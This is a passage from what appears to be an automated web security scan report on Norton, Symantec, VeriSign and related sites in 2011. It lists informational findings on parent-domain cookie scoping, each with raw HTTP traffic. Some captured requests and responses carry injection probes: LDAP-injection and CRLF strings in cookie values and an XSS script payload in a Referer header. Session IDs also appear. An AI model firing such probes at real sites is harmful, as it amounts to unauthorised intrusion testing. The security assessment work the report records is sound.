PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://www.norton.com/onlinehelp
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 259

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.norton.com/onlinehelp">
...[SNIP]...

9.19. http://buy.norton.com/upgrades-renewals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/upgrades-renewals

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:18; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:20 GMT
Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=5c55d1c3-a981-4fb5-9327-d629b62b51071315603880402
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:18; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LANGUAGE=EN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/up
...[SNIP]...

9.20. http://buy.symanteccloud.com/freetrial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.symanteccloud.com
Path:	/freetrial

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /freetrial HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 471

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.21. http://buy.symanteccloud.com/smbstore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.symanteccloud.com
Path:	/smbstore

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smbstore HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 459

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.22. http://free.pctools.com/res/js/utils.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://free.pctools.com
Path:	/res/js/utils.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /res/js/utils.php HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com

9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

9.24. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.25. http://sales.liveperson.net/hc/71097838/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/downloads/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.31. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.32. https://trust-center.verisign.ch/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.33. https://trust-center.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.34. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.35. https://trust-center.verisign.com/process/retail/help_and_support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/help_and_support

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.36. https://trust-center.verisign.com/process/retail/redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/redirect

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
